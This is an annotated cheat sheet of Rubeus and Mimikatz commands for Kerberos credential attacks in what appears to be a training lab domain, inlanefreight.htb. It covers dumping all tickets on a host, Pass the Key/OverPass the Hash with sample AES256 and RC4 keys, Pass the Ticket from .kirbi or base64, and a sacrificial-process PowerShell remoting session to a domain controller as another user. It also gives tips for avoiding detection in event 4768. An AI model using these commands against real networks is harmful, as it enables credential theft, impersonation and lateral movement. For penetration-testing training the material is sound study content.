Rubeus.exe
Note: to collect all tickets on a host (every logon session, not just your own), Mimikatz or Rubeus must be run as an administrator.
# Dumps all tickets on the host when running as local admin (unelevated it only shows the current logon session's tickets)
# /nowrap prints each base64 ticket on a single line for easier copy-paste.
Rubeus.exe dump /nowrap
Mimikatz requires administrative rights to perform the Pass the Key/OverPass the Hash attacks (sekurlsa::pth injects the key into LSASS), while Rubeus does not: asktgt sends an AS-REQ encrypted with the key and receives a TGT from the DC, which /ptt can import into the current, unprivileged logon session.
# Pass the Key / OverPass the Hash: Rubeus uses the user's Kerberos key to request a TGT (an AS-REQ)
# instead of injecting the key into LSASS, which is why no admin rights are needed.
# First obtain the user's Kerberos keys, e.g. with mimikatz sekurlsa::ekeys, which also lists the AES256 key.
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap
# Same request with the RC4 key (the NT hash); /ptt imports the resulting TGT straight into the
# current logon session (Pass the Ticket). Caveat: an RC4 (etype 23) TGT request in a domain that
# supports AES stands out as an encryption downgrade in event 4768, so prefer /aes256 when you have it.
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt
# Another way is to import a ticket saved on disk as a .kirbi file into the current logon session.
Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi
# Or convert the .kirbi to base64 (from PowerShell) and pass the string instead of the file.
[Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"))
# Take the output of the command above and pass it to /ticket as shown below.
# The base64-encoded ticket printed by Rubeus.exe dump /nowrap can be used the same way.
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIID7aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2h0Yi5jb22jggO7MIIDt6ADAgESoQMCAQKiggOpBIIDpY8Kcp4i71zFcWRgpx8ovymu3HmbOL4MJVCfkGIrdJEO0iPQbMRY2pzSrk/gHuER2XRLdV/<SNIP>
# PowerShell Remoting with Pass the Ticket
# First create a sacrificial process with Rubeus. createnetonly starts the program with a
# "netonly" logon (logon type 9, NewCredentials), i.e. in a fresh logon session, so the ticket
# imported next does not overwrite the tickets of your current session. /show makes the new cmd window visible.
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
# In that new window, request a TGT with the user's AES256 key and import it with /ptt,
# so the sacrificial session holds john's TGT and can authenticate to the DC remotely.
# Note: a local whoami in this window still shows your original user; the new credentials are only used over the network.
Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /ptt
# Then start PowerShell from the same window and connect. Use the DC's hostname (not its IP address)
# so WinRM negotiates Kerberos and presents the injected TGT.
powershell
Enter-PSSession -ComputerName DC01
# Inside the remote session, whoami reports the impersonated user john and hostname reports DC01.
whoami
hostname